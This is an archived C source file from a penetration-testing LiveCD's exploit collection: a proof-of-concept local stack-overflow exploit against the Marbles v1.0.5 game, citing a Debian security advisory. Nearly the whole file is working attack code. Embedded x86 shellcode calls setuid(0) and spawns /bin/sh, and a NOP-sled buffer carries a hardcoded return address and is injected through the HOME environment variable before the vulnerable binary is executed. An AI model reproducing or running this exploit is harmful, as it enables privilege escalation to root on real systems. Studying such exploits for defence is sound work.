home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / games / marbles / c-marbles.c < prev   
Encoding:
C/C++ Source or Header  |  2005-02-12  |  2.3 KB  |  71 lines
  1. /* c-marbles.c
  2.  *
  3.  * PoC exploit made for advisory based uppon an local stack based overflow.
  4.  * Vulnerable versions, maybe also prior versions:
  5.  *
  6.  * Marbles v1.0.5
  7.  *
  8.  * Tested on:  Redhat 9.0
  9.  *
  10.  * Advisory source: Steve Kemp
  11.  * http://www.debian.org/security/2003/dsa-390
  12.  *
  13.  * ---------------------------------------------
  14.  * coded by: demz (c-code.net) (demz@c-code.net)
  15.  * ---------------------------------------------
  16.  *
  17.  */
  18.  
  19. #include <stdio.h>
  20. #include <stdlib.h>
  21.  
  22. char shellcode[]=
  23.  
  24.         "\x31\xc0"                      // xor          eax, eax
  25.         "\x31\xdb"                      // xor          ebx, ebx
  26.         "\x31\xc9"                      // xor          ecx, ecx
  27.         "\xb0\x46"                      // mov          al, 70
  28.         "\xcd\x80"                      // int          0x80
  29.  
  30.         "\x31\xc0"                      // xor          eax, eax
  31.         "\x50"                          // push         eax
  32.         "\x68\x6e\x2f\x73\x68"          // push  long   0x68732f6e
  33.         "\x68\x2f\x2f\x62\x69"          // push  long   0x69622f2f
  34.         "\x89\xe3"                      // mov          ebx, esp
  35.         "\x50"                          // push         eax
  36.         "\x53"                          // push         ebx
  37.         "\x89\xe1"                      // mov          ecx, esp
  38.         "\x99"                          // cdq
  39.         "\xb0\x0b"                      // mov          al, 11
  40.         "\xcd\x80"                      // int          0x80
  41.  
  42.         "\x31\xc0"                      // xor          eax, eax
  43.         "\xb0\x01"                      // mov          al, 1
  44.         "\xcd\x80";                     // int          0x80
  45.  
  46. int main()
  47. {
  48.         unsigned long ret = 0xbffff70c;
  49.  
  50.         char buffer[3988];
  51.         int i=0;
  52.  
  53.         memset(buffer, 0x90, sizeof(buffer));
  54.  
  55.         for (0; i < strlen(shellcode) - 1;i++)
  56.         buffer[2000 + i] = shellcode[i];
  57.  
  58.         buffer[3988] = (ret & 0x000000ff);
  59.         buffer[3989] = (ret & 0x0000ff00) >> 8;
  60.         buffer[3990] = (ret & 0x00ff0000) >> 16;
  61.         buffer[3991] = (ret & 0xff000000) >> 24;
  62.         buffer[3992] = 0x0;
  63.  
  64.         printf("\nMarbles v1.0.5 local exploit\n");
  65.         printf("---------------------------------------- demz @ c-code.net --\n");
  66.  
  67.         setenv("HOME", buffer, 1);
  68.  
  69.         execl("/usr/local/bin/marbles", "marbles", NULL);
  70. }
  71.